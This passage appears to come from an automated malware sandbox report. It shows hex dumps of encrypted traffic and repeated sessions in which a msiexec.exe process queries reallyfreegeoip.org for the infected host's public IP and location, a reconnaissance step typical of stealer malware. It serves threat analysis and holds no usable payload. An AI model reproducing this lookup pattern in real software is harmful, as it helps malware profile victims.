                                                                  2025-01-10 15:02:43 UTC1390INData Raw: 7c 1d ba 44 09 44 e5 13 34 b3 a4 c4 f8 d1 b6 f4 87 39 7f ae c4 1e 66 d2 ac bb 29 96 5c d3 7f 2f c2 dd ab de 92 34 ce 08 55 be 75 c5 41 31 4a f5 a0 80 d1 07 98 61 7d be 2b 18 4b 65 65 e7 5a cf de 98 0c c7 59 e2 78 49 62 26 df 5c 63 0d d3 2e 3a 63 42 7e 24 f4 bc cf 70 99 38 f2 71 f9 d3 ca ee 9a 19 1c 55 4b 1f 2f d9 5d 33 7e f5 f8 40 1b 1f 83 c0 0c 5c 14 64 00 e9 c1 02 6b 33 e9 99 3c 5a ab 22 c4 0f b5 99 d6 f4 56 f6 9c fc f6 51 07 05 15 81 d4 88 c3 1d 5d 05 e8 6c c6 37 ee a8 ab 42 36 0c e9 b6 98 f1 c9 8e f8 a8 0d dd e1 b6 57 64 b4 b8 7f f7 82 06 e7 f6 df 4b a5 b3 38 2c a3 69 dc 23 96 c2 de e9 28 09 a4 01 fa 8d ad 06 60 ec 67 6d b7 73 41 0b 3b 68 e4 ec 9c a3 3e 9b 83 bf af ff bd 8b 9b a9 ae 8a bb d9 6f 93 7d 40 d9 1c 4c 1d d7 12 6c 6e f8 f0 e2 9c 79 87 05 b0
                                                                  Data Ascii: |DD49f)\/4UuA1Ja}+KeeZYxIb&\c.:cB~$p8qUK/]3~@\dk3<Z"VQ]l7B6WdK8,i#(`gmsA;h>o}@Llny
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: 52 f0 f4 98 84 fb f8 61 e5 72 13 24 79 2e a2 a8 c0 3d d9 8c b5 ce 81 fc 39 70 8b 40 02 be 0a ba 34 21 21 cf 52 42 dc 61 c6 f8 db b6 fd 8a 4b 05 93 c4 6e 4e 5a ad bb 23 ea 80 cb 7f 5f ea b8 ab de 98 5b 08 86 55 b4 75 56 2b 31 4a ba b2 8d f9 7f 98 61 7b e8 25 09 47 16 ab e7 5a 52 cc 97 1d e4 2b 2c 78 8d 6a 35 cf 5d 6f 62 1c 6b 3a 69 52 71 56 d2 a1 3c 02 e7 36 c3 70 fd fb a7 ea 9a 13 7e 7d 53 1f 1a aa 8d 32 7e ff 97 91 84 1b 89 c0 ea 50 7b ab 96 ec cb 13 6b 41 d3 84 79 2a d5 2d d7 3f b3 b1 8e f4 56 fc e4 d4 ee 40 77 04 9d 9a d4 f2 ae e4 19 05 e2 6a b2 34 ee ae 85 31 f1 0c fa 8c 89 e0 a6 aa f8 a8 03 af cd a5 57 66 38 8b 29 87 80 24 b5 08 de 5e bd 89 2a 06 85 78 cd 34 ea 3a dc e9 33 09 a4 2a fb 8d bc 06 76 f1 5b 76 b7 09 43 23 6e 79 9a c0 96 88 3a b5 60 bf af
                                                                  Data Ascii: Rar$y.=9p@4!!RBaKnNZ#_[UuV+1Ja{%GZR+,xj5]obk:iRqV<6p~}S2~P{kAy*-?V@wj41Wf8)$^*x4:3*v[vC#ny:`
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: 38 5f 86 22 65 36 24 fe 1d b2 e3 8b b0 bd 25 ab 30 9a 45 e2 65 a7 2a f5 36 43 c2 8e 38 36 33 f4 9c 2c a0 cd 13 63 6a 7c 90 db 06 d3 a8 d1 3b a0 08 49 ce f1 de 8f 1f f3 4a 70 76 11 b2 4e 22 44 c9 78 48 a8 94 cf f8 5d b3 ec 86 1e 7f 8f d5 1e 18 f2 ad bb 2d ea 08 c4 7f 5f d4 f5 fd de 92 3e d8 78 54 b4 73 47 51 30 4a bc b5 50 b8 14 98 60 55 d6 2b 18 40 17 01 f0 5a 28 c8 15 0f ea 58 e3 5d 9b 1e 0b df 4c 67 25 d7 6b 3a 65 2c c8 24 f4 b6 4e 72 84 38 b3 58 9c d3 ee e0 e4 28 0c 55 4f 37 20 d9 5d 38 00 fb f8 40 80 33 c9 c0 fb 56 b6 70 82 f8 e9 b5 7b 33 e3 ed fd 5a ab 22 dc 3f b0 eb 65 e3 56 86 f9 44 f6 40 0d 77 4a e4 ff f8 c1 31 67 29 e8 6a c8 6f 57 ae 81 48 59 b6 fa 86 90 f1 f0 0c f8 a8 0d c0 6c e7 57 16 2f 86 69 f5 fa 32 a3 86 7d 68 b8 b0 89 2a 89 63 7e 06 9d 80
                                                                  Data Ascii: 8_"e6$%0Ee*6C863,cj|;IJpvN"DxH]-_>xTsGQ0JP`U+@Z(X]Lg%k:e,$Nr8X(UO7 ]8@3Vp{3Z"?eVD@wJ1g)joWHYlW/i2}h*c~
                                                                  2025-01-10 15:02:43 UTC1390INData Raw: a3 f9 a1 1b a1 49 3e 47 3b 7f 59 f1 82 35 3c a4 b0 c1 ad 24 22 c5 94 93 77 82 b5 e4 0a 38 5f 86 20 65 74 2a fe 1d b2 ee e9 ce 98 2f 09 1c 43 60 f8 1d 26 3f 87 3e fc e7 e5 38 33 33 f4 9c a6 cc d1 61 ef 04 86 f8 79 5e 80 f5 d1 31 ad 31 b5 df e7 fc c8 70 8b 4c 70 a2 0e 9f 6c 3d 44 cf 58 5b ab a4 ee ab d1 b6 e6 58 39 7f 8f c4 34 27 97 ad bb 2b 98 5c d3 8c 2f c2 dd be de 92 34 c6 87 55 be 79 7e 41 31 4a bc a1 80 d1 14 98 61 12 fb 2b 18 ed 65 65 e7 4c 59 df 98 1f ea 58 e2 3d 8d 60 27 df 4c 63 0d b7 6a 3a 63 5d 7f 24 f4 3e 3e 72 99 28 c3 70 f9 96 ee ea 9b 19 0c 55 4b ae 68 d9 5d 6d 7f f5 f8 50 80 1b 83 d0 fb 5c 14 21 96 ec c0 02 7b 33 e9 1f 7d 5a ab d1 d7 3f b7 e1 c2 f4 56 e6 96 fc f6 05 07 77 4c 89 e4 fa c1 58 19 05 e8 76 cc 1c ff ae a9 d6 36 0c f0 8d 9d e2 dd
                                                                  Data Ascii: I>G;Y5<$"w8_ et*/C`&?>833ay^11pLpl=DX[X94'+\/4Uy~A1Ja+eeLYX=`'Lcj:c]$>>r(pUKh]mP\!{3}Z?VwLXv6


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.949909104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 15:02:46 UTC859INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:46 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836155
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLThORd903Qcl29RiQnLYqqnvIpmvq7qftoMtmNXBETjiq%2Fud5en0BagmXhN4a21VoG1qf%2FbGpp%2BPRmFWEVsjxKVj%2BGhrwz1czwMeAZL7a71laquQ%2BBeJPHAt6k8wYn4saVWopVh"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8ccaff0e727b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1994&rtt_var=750&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1464393&cwnd=234&unsent_bytes=0&cid=5a8b058d15bb70a9&ts=165&x=0"
                                                                  2025-01-10 15:02:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.949915104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:47 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  2025-01-10 15:02:47 UTC855INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:47 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836156
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXG6ER6UZqm5Tmblj%2FfTwnUCowFzy95WfelG%2BoBFRyARqCeyFn1wxeADXzhaaerWh%2BuJ1jZVwpeLQwH1SEeDtiKxC7IrztSOvJb3Va9MZ0rZq5FNhfbWhmaizqjTo9PeXqMqkbra"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8cd05edfc34f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1466&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1910994&cwnd=181&unsent_bytes=0&cid=2c70289dba2e1603&ts=151&x=0"
                                                                  2025-01-10 15:02:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.949924104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:48 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  2025-01-10 15:02:48 UTC861INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:48 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836157
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sxLAuf4mfKcywojFosNK8I9i5K%2BLBMGjrMMGW0wjnYiXOBrBhfBltmfDlJbnxpUB91hYV6R2jl%2B%2BvzrcCJfcVMgirvV%2B%2Bom%2FgZJAgLnZGN1bPZsSXpCi5WGtOYzTeEsXBg6Bwn5Z"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8cd82d1a0f5b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1648&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1696687&cwnd=221&unsent_bytes=0&cid=6f6dfab1ff59de3a&ts=142&x=0"
                                                                  2025-01-10 15:02:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.949933104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  2025-01-10 15:02:49 UTC855INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:49 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836158
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSz3tcxCYveJLsIm92UCg5Pf%2B34FepBUWy5CjO7KzOd%2B4hs3CaEqwtJcyhTTnk0GPAjYK%2FyV6YTTWLkNP6Y7ctS63qZmj1o2oWUzehTI5zrxTWhjjLR0biv1z54YTPY9Vz8axQNp"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8ce02d5fc34f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1482&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1950567&cwnd=181&unsent_bytes=0&cid=3dcc244f27cd6588&ts=147&x=0"
                                                                  2025-01-10 15:02:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.949945104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 15:02:51 UTC860INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:51 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836160
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmO8bOpoWqA%2Bg6LXVS11bxFCouL9iwJxC5tGyWQ1%2FA3Vdxbt3s0Jb4T9oXO489%2BcPOXlocRJJzY6Ih3Scpf6O%2Bg6NTrlvzJwZdFWB7Xh6VvHrXcBBrI4EYUwExBLYTpYpjgff29A"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8ce90da143b3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=24066&min_rtt=10967&rtt_var=13031&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=266253&cwnd=203&unsent_bytes=0&cid=be44bb20218b543c&ts=180&x=0"
                                                                  2025-01-10 15:02:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.949953104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 15:02:52 UTC855INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:52 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836161
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuEa2b0XUG39OoeaFigKZGZfsejNzF4r96eWjrZSbHZDBIX0qcph1My47eI8E1MqarFpJPWH1Xdib7rnyGfY7oufiRV5y3Sw%2Fhw9cmeoWD4NB%2F5tR14MAyGVRqob%2BGbGt3g9h0Id"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8cf10e740f5b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1608&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1726788&cwnd=221&unsent_bytes=0&cid=6ce3766c04b73807&ts=141&x=0"
                                                                  2025-01-10 15:02:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.949964104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 15:02:53 UTC855INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:53 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836162
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YX5gE1963VI%2FKv9KDDEAnslNaWeFdz3ObTPvC0zf8oKH7DnpQRuTEcoqcWxn6UgwKOU0Jc%2FMogK1PUF3RDQT42p0rXwCkYZ3AIpWlvJ%2Fvd7LMSvHMG9S96loQsB713mMBuGsjvU6"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8cf8dcb643b3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1558&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1755862&cwnd=203&unsent_bytes=0&cid=d641f99e9b07e4c6&ts=146&x=0"
                                                                  2025-01-10 15:02:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.949974104.21.112.14435400C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 15:02:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 15:02:54 UTC865INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 15:02:54 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1836163
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVnnf21Hf1u1%2FhboH01QJZE5rNWT6I9JuwXTovp8zhYHxS2vXyx%2BEaU6s8KkKdg4vf1SIf8D%2Fu%2FoGiTMT7Mdtdny4DXv0wN%2BfbShc9JFNSYWuWgERFhkL%2FW8%2BxEg%2ByKMNVqBUdsl"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd8d00a8c7727b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
